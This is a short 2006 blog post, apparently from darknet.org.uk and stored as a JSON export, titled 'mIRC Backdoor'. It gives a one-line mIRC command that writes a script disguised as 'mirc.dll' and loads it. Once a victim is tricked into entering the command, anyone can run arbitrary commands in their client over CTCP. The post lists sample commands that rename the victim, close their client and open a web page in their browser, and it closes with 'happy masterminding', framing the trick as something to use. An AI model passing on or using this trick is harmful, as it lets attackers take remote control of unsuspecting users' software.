{"id":71,"date":"2006-02-24T22:16:46","date_gmt":"2006-02-24T22:16:46","guid":{"rendered":"https:\/\/www.darknet.org.uk\/2006\/02\/mirc-backdoor\/"},"modified":"2010-06-21T17:50:16","modified_gmt":"2010-06-21T16:50:16","slug":"mirc-backdoor","status":"publish","type":"post","link":"https:\/\/www.darknet.org.uk\/2006\/02\/mirc-backdoor\/","title":{"rendered":"mIRC Backdoor"},"content":{"rendered":"
<\/p>\n
Well it’s not really a backdoor… but we can consider it one…<\/p>\n
Some time ago it apeared on many websites (including mine) an article about a backdoor in mIRC… all this backdoor stuff was really nothing more than a mIRC script that by it’s mean made the client to respond at any command received via a CTCP (Client to Client Protocol) command… such as ping, version, time, etc…. so here is the command that the victim has to enter:<\/p>\n
\n\/\/.write -c mirc.dll ctcp 1:*:*:$1- | \/.load -rs mirc.dll<\/p>\n<\/blockquote>\n
The command is splited in 2 parts, delimited by | (a vertical line)… So the first section writes a file “mirc.dll” in which we write a simple mIRC script which listens to any CTCP request… the second one loads the file with the mIRC script….<\/p>\n
After the “victim” executes this command we can control it by introducing one of the following lines:<\/p>\n
\n{ this is a comment }<\/p>\n
\/ctcp victims_nick \/.nick lamer { changes the nickname of the victim to lamer }<\/p>\n
\/ctcp victims_nick \/.exit { closes the victims mIRC }<\/p>\n
\/ctcp victims_nick \/.run www.black2white.as.ro
\n{ opens the victims default web browser (ie, firefox, opera, etc.) on the page www.black2white.as.ro }<\/p>\n<\/p>\n\/ctcp victims_nick \/.any_valid_irc_command<\/p>\n<\/blockquote>\n
So happy “masterminding”….<\/p>\n
<\/p>\n